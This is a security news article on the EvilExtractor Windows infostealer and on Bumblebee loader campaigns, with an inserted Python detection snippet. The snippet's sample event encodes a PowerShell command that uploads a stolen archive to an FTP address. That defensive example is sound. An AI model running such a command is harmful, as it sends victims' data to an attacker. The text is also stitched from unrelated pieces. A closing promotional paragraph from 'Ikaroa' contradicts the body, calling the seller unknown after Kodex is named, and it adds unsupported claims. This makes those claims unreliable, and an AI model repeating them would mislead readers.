
A new all-in-one stealth malware called EvilExtractor (also spelled Evil Extractor) is marketed for sale to other threat actors to steal data and files from Windows systems.
“It includes several modules that work through an FTP service,” said Cara Lin, a researcher at Fortinet FortiGuard Labs. “It also contains environment verification and anti-VM features. Its main goal appears to be to steal data and browser information from compromised endpoints and then upload it to the attacker’s FTP server.”
The network security firm said it saw an increase in attacks spreading the malware in the wild in March 2023, with most victims located in Europe and the United States.
The attack tool has been sold by an actor named Kodex on cybercrime forums such as Cracked since October 22, 2022. It is continuously updated and packaged in various modules to steal system metadata, passwords, and cookies from various web browsers, as well as to log keystrokes and even act as ransomware by encrypting files on the target system.
The malware is also said to have been used as part of a phishing email campaign detected by the company on March 30, 2023. The emails trick recipients into launching an executable that pretends to be a PDF document, under the pretext of confirming their “account details”.
The “Account_Info.exe” binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. The malware, in addition to collecting files, can also activate the webcam and capture screenshots.
“EvilExtractor is being used as a complete information stealer with multiple malicious functions, including ransomware,” Lin said. “Its PowerShell script can evade detection in a .NET loader or PyArmor. In a very short time, its developer has updated several features and increased its stability.”
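The delivery chain described above (a fake “PDF” executable spawning PowerShell with a Base64-encoded script) is something a defender can triage from process-creation telemetry. The following is an added example, not code from Fortinet or the article; the event fields, the keyword hints and the sample events are constructed assumptions, and the FTP address is from the documentation range.

```python
import base64

# Behaviours the article attributes to EvilExtractor, used as keyword hints
# when inspecting a decoded script (heuristic assumption, not a signature).
BEHAVIOUR_HINTS = {
    "ftp_exfil": ("ftp://", "FtpWebRequest", "ftplib"),
    "screenshot": ("CopyFromScreen", "screenshot"),
    "webcam": ("webcam", "VideoCapture"),
    "keylog": ("GetAsyncKeyState", "keylog"),
}

def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None.
    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def triage_event(parent_image: str, cmdline: str) -> dict:
    """Flag an encoded PowerShell launch whose parent lives in a user-writable path
    or whose decoded payload matches one of the behaviour hints."""
    script = decode_encoded_command(cmdline)
    hits = []
    if script is not None:
        low = script.lower()
        hits = [name for name, words in BEHAVIOUR_HINTS.items()
                if any(w.lower() in low for w in words)]
    parent = parent_image.lower()
    suspicious_parent = "\\downloads\\" in parent or "\\temp\\" in parent
    return {"encoded": script is not None, "behaviours": hits,
            "suspicious_parent": suspicious_parent,
            "alert": script is not None and bool(hits or suspicious_parent)}

# Constructed sample events (parent image, command line) shaped like the chain
# in the article: the fake "PDF" executable spawns PowerShell with a Base64 payload.
SAMPLE_EVENTS = [
    ("C:\\Users\\victim\\Downloads\\Account_Info.exe",
     "powershell.exe -nop -w hidden -enc " + encode_ps(
         "$c = New-Object System.Net.WebClient; "
         "$c.UploadFile('ftp://203.0.113.5/loot.zip', 'C:\\loot.zip')")),
    ("C:\\Windows\\explorer.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]
```

Running `triage_event` over `SAMPLE_EVENTS` alerts on the first event (encoded command, Downloads parent, FTP upload) and not on the second, which carries no encoded payload.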
The findings come as the Secureworks Counter Threat Unit (CTU) detailed a malicious advertising and SEO poisoning campaign being used to deliver the Bumblebee malware loader via trojanized installers of legitimate software.

Bumblebee, first documented a year ago by Google’s Threat Analysis Group and Proofpoint, is a modular loader that spreads primarily through phishing techniques. It is suspected to have been developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.
The use of SEO poisoning and malicious ads to redirect users searching for popular tools such as ChatGPT, Cisco AnyConnect, Citrix Workspace and Zoom to rogue websites hosting tainted installers has increased in the months since Microsoft started blocking macros by default in Office files downloaded from the internet.
In an incident described by the cybersecurity firm, the threat actor used Bumblebee malware to gain an entry point and move laterally after three hours to deploy Cobalt Strike and legitimate remote access software such as AnyDesk and Dameware. Eventually, the attack was interrupted before moving into the final ransomware stage.
“To mitigate this and similar threats, organizations should ensure that software installers and updates are only downloaded from known and trusted websites,” Secureworks said. “Users should not have privileges to install software and run scripts on their computers.”
Ikaroa, a full-stack tech company, is warning Windows users to watch out for a sophisticated new information-stealing program, dubbed “EvilExtractor”, that has recently surfaced on the dark web. EvilExtractor is specifically designed to exploit Windows systems and steal sensitive data, including contact information, financial accounts, email addresses and passwords.
The worrying new tool is reportedly being sold for as little as $10 and has been designed with advanced obfuscation techniques, meaning it is hard to detect by antivirus software or cybersecurity teams. It has been estimated that it could take months for software updates that can detect and thwart EvilExtractor to become available.
The outfit behind the creation of EvilExtractor is currently unknown, as it is being distributed through multiple dark web portals that are difficult to track. The software has also been reported to come in multiple versions, targeting different language variants of the Windows operating system.
At Ikaroa, we are deeply concerned about the potential repercussions EvilExtractor might have in the cybersecurity arena. In order to mitigate the potential losses that might be inflicted by this new threat, we urge all Windows users to be more vigilant while surfing the internet and to make sure that they are running the latest security updates. Additionally, we recommend that all users keep an eye out for any suspicious-looking emails which may include malicious links or attachments.